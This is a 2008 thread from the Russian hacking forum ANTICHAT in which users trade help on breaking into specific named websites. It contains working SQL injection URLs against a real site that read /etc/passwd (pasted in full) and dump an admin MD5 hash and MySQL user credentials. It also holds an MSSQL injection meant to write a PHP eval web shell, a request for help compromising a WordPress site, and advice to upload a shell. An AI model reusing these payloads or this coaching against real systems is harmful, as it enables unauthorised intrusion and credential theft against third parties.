FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 257 из 2422

257

Опции темы

Поиск в этой теме

Опции просмотра

10.07.2008, 14:35

Doom123

Постоянный

Регистрация: 11.11.2006

Сообщений: 834

Провел на форуме:
3941248

Репутация: 668

Почему советуют использовать
mysql_real_escape_string()
или mysql_escape_string()
а не addslashes()?

Можно ли воспользоватся тем что используется addslashes()?

'SELECT `username` FROM `member` WHERE `id` = \' '. addslashes($str) .' \'

хммм

сделал

$a = "\x1a";

echo "slesh ".addslashes($a).'<br>';
echo "mysql ".mysql_real_escape_string($a);

результат

slesh
mysql \Z

В 1ом слэш не добввился просто
а во 2ом не понел откуда \Z взялось oO

Последний раз редактировалось Doom123; 10.07.2008 в 18:49..

10.07.2008, 21:01

cric.cric

Познающий

Регистрация: 02.06.2008

Сообщений: 52

Провел на форуме:
218331

Репутация: 10

Привет всем!Нужна помощь!!!
Кто может помочь найти уязвимость в этом сайте http://kunik.no-ip.com/wordpress версия движка wordpress-2.5 помочь залить этот файл с сайта http://rapidshare.com/files/128670416/user.php.html на этот сайт http://kunik.no-ip.com/
Зарание спосибо!!!

10.07.2008, 21:26

6u4yxa

Новичок

Регистрация: 16.11.2007

Сообщений: 22

Провел на форуме:
147197

Репутация: 5

Всем привет..
Товарисчи такое вот дело.. нашел скуль и все бы не чего если бы база была mysql c outfile, но увы MSSQL.
Побегал по форуму нашел кое что пробую, пишет - Warning: mssql_query() [function.mssql-query]: message: Line 1: Incorrect syntax near '\'. (severity 15)

сам запрос -

Код:

http://ip/stat.php?type=melee'+union+select+1,'<?php eval($_GET['e']) ?>',3,4,5,6,7,8,9,10,11,12,13+exec+master..sp_makewebtask+'D:\AppServ\www\123.txt'%20--

Что тут не так?

10.07.2008, 22:06

n0ne

Постоянный

Регистрация: 01.01.2007

Сообщений: 796

Провел на форуме:
2693408

Репутация: 861

6u4yxa, дело в том, что у каждой СУБД свой синтаксис. Вот, почитай статейку - https://forum.antichat.ru/thread30501.html

11.07.2008, 01:00

Micr0b

Участник форума

Регистрация: 14.01.2006

Сообщений: 242

Провел на форуме:
2630617

Репутация: 245

нашол скуль, фильтрации на чтения каталогов нет
http://www.dengi-info.com/news/?nid=-92588+union+select+1,2,3,4,load_file('../../../etc/passwd'),6/*

http://dengi-info.com/phpinfo.php

пхпинфо - там есть полные пути хотел прочитать файл админки неполучаеца =\
путь - /var/www/vhosts/dengi-info.com/httpdocs или /var/www/vhosts/dengi-info.com
админка - http://dengi-info.com/admin/index.php

Код HTML:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
webadmin:x:500:500::/home/webadmin:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
popa3d:x:84:501::/dev/null:/dev/null
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
alias:x:2021:2020:Qmail User:/var/qmail/alias:/bin/false
qmaild:x:2020:2020:Qmail User:/var/qmail/:/bin/false
qmaill:x:2022:2020:Qmail User:/var/qmail/:/bin/false
qmailp:x:2023:2020:Qmail User:/var/qmail/:/bin/false
qmailq:x:2520:2520:Qmail User:/var/qmail/:/bin/false
qmailr:x:2521:2520:Qmail User:/var/qmail/:/bin/false
qmails:x:2522:2520:Qmail User:/var/qmail/:/bin/false
popuser:x:110:31:POP3 service user:/var/qmail/popuser:/bin/false
psaadm:x:2523:2521:Admin Server:/:/bin/false
psaftp:x:2524:2522:anonftp psa user:/:/bin/false
lukasaddon:x:10001:2524::/var/www/vhosts/dengi-info.com:/bin/false
teletrade:x:10002:2524::/var/www/vhosts/teletrade.com.ua:/bin/false
kiev:x:10003:2524::/var/www/vhosts/teletrade.kiev.ua:/bin/false
aserrr:x:10004:2524::/var/www/vhosts/teletrade.bg:/bin/false

Почему немогу прочитать, и что делать...?
кодировал ефекта 0.

Последний раз редактировалось Micr0b; 11.07.2008 в 01:03..

11.07.2008, 01:47

gisTy

Постоянный

Регистрация: 24.05.2008

Сообщений: 589

Провел на форуме:
3629857

Репутация: 504

ну так залей шелл и смотри файлы..

11.07.2008, 01:48

Doom123

Постоянный

Регистрация: 11.11.2006

Сообщений: 834

Провел на форуме:
3941248

Репутация: 668

во всех современых версиях линука не хранятса пароли в чистом виде ... нужно искать shadow

11.07.2008, 02:35

Micr0b

Участник форума

Регистрация: 14.01.2006

Сообщений: 242

Провел на форуме:
2630617

Репутация: 245

gisTy>> ефекта 0 проверял =\\

11.07.2008, 02:42

nex0

Познающий

Регистрация: 06.11.2007

Сообщений: 57

Провел на форуме:
2688963

Репутация: 272

Micr0b, ну значит с правами что-то...
ничего для чтения тут не сделаешь

Последний раз редактировалось nex0; 12.07.2008 в 01:39..

#10

11.07.2008, 02:50

159932

Постоянный

Регистрация: 28.09.2007

Сообщений: 820

Провел на форуме:
6722038

Репутация: 1385

http://www.dengi-info.com/news/?nid=-92588+union+select+1,2,3,4,5,concat(admin,0x3a,adm in_pw)+from+phpads_config/*
admin:dee9eb25bb8bf64bb3097fd26c13911c - обычный md5
.зы попробовать к админке оч даже можно ..
===============================
http://www.dengi-info.com/forum//docs/CHANGELOG.html
3 пхпбб // возможно колонки по дефолту - не помню какие в 3ем ..
===============================
http://www.dengi-info.com/news/?nid=-92588+union+select+1,2,3,4,user,password+from+mysq l.user+limit+1,1
юзер pma_kIkP50QYhmSS наводит мысль о скрытом, а точнее переименованном phpmyadmin .. тк кк дефолтные имена не нашёл ..
===============================
http://www.dengi-info.com/news/?nid=-92588+union+select+1,2,3,4,user,concat_ws(0x3a,use r,password,host)+from+mysql.user+where+host=0x25+l imit+0,1/*
kpblca:28b270316169288e:% - возможно получится подконектится удалённо к базе ..

Последний раз редактировалось 159932; 11.07.2008 в 03:04..

Страница 257 из 2422

257

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules